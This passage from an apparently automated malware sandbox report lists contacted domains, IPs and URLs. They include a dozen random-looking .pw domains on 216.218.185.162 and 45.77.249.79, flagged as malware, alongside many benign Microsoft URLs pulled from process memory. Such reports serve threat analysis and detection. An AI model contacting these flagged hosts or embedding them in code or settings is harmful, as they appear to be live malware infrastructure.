            http://spaines.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://powerpoint.office.comxee0%Avira URL Cloudsafe
            https://www.ng.com0%Avira URL Cloudsafe
            http://uyhgqunqkxnx.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://xsts.auth.xboxlive.comm0%Avira URL Cloudsafe
            http://cmnsgscccrej.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://assets.activity.windows.coms0%Avira URL Cloudsafe
            https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
            https://excel.office.comcp0%Avira URL Cloudsafe
            https://activity.windows.comt0%Avira URL Cloudsafe
            http://fkmmvfeonnyh.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://gfnlmtcolrrb.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://vcklmnnejwxx.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://login.windows.local/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vcklmnnejwxx.pw
            		216.218.185.162
            		truetrue
              		unknown
              mfueeimvyrsp.pw
              		216.218.185.162
              		truetrue
                		unknown
                wwgfyvvdtmeq.pw
                		216.218.185.162
                		truetrue
                  		unknown
                  fccfxejgtpqb.pw
                  		216.218.185.162
                  		truetrue
                    		unknown
                    cmnsgscccrej.pw
                    		216.218.185.162
                    		truetrue
                      		unknown
                      vrmtybxxpddg.pw
                      		216.218.185.162
                      		truetrue
                        		unknown
                        utmyhnffxpcj.pw
                        		216.218.185.162
                        		truetrue
                          		unknown
                          xtbbpqfrsubt.pw
                          		216.218.185.162
                          		truetrue
                            		unknown
                            gfnlmtcolrrb.pw
                            		216.218.185.162
                            		truetrue
                              		unknown
                              uyhgqunqkxnx.pw
                              		45.77.249.79
                              		truetrue
                                		unknown
                                spaines.pw
                                		216.218.185.162
                                		truetrue
                                  		unknown
                                  evbsdqvgmpph.pw
                                  		216.218.185.162
                                  		truetrue
                                    		unknown
                                    fkmmvfeonnyh.pw
                                    		216.218.185.162
                                    		truetrue
                                      		unknown
                                      rvqlfnedcldh.pw
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://evbsdqvgmpph.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://fccfxejgtpqb.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://uyhgqunqkxnx.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://spaines.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://xtbbpqfrsubt.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://wwgfyvvdtmeq.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://cmnsgscccrej.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://mfueeimvyrsp.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://gfnlmtcolrrb.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://vcklmnnejwxx.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://fkmmvfeonnyh.pw/EiDQjNbWEQ/true
                                        • Avira URL Cloud: malware
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://assets.activity.windows.com/v1/assetssvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aefd.nelreports.net/api/report?cat=bingaotakSearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1761686627.0000024B4239F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://outlook.office.com/M365.AccessSearchApp.exe, 0000000B.00000000.1774346407.0000024B447CF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1640019930.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://substrate.office.com/SubstrateSearch-Internal.ReadWriteOSearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.3058572833.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1640019930.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://wns.windows.com/Lexplorer.exe, 00000003.00000000.1640019930.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://word.office.comexplorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://outlook.live.com/owaSearchApp.exe, 0000000B.00000000.1758577403.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://%s.xboxlive.comsvchost.exe, 00000005.00000002.2908871960.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714413408.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		low
                                                                                      https://outlook.comStartMenuExperienceHost.exe, 00000009.00000000.1726392280.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2908493718.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://substrate.office.comSearchApp.exe, 0000000B.00000000.1814959925.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://login.windows.net/svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://substrate.office.com/search/api/v1/events?scenario=SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aefd.nelreports.net/api/report?cat=bingrmsSearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://powerpoint.office.comxeeStartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://outlook.com_explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		low
                                                                                                      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://fb.me/react-polyfillsThisSearchApp.exe, 0000000B.00000000.1780439279.0000024B44916000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://xsts.auth.xboxlive.com/svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://login.windows.netsvchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://xsts.auth.xboxlive.comsvchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://mths.be/fromcodepointSearchApp.exe, 0000000B.00000000.1854349272.0000024B5843A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.microexplorer.exe, 00000003.00000000.1638748938.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1636906084.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1637467440.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2954695107.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://outlook.office.com/SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://login.windows.localsvchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://www.ng.comSearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchApp.exe, 0000000B.00000000.1804409730.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://api.msn.com/qexplorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://graph.windows.net/SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://substrate.office.com/search/apiSearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://xsts.auth.xboxlive.commSearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://loki.delve.office.com/apiSearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://assets.activity.windows.comersvchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmSearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://assets.activity.windows.comssvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://activity.windows.comtsvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://substrate.office.com/search/api/v2/queryetItemChttps://substrate.office365.us/search/api/v2/SearchApp.exe, 0000000B.00000000.1811664629.0000024B5530E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://login.windows.local/svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000003.00000002.3032615601.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://outlook.office365.com/mail/deeplink/attachment/SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://fb.me/react-polyfillsSearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://api.msn.com/explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://assets.activity.windows.comsvchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://activity.windows.comsvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://excel.office.comcpStartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high

                                                                                                                                                                                    World Map of Contacted IPs

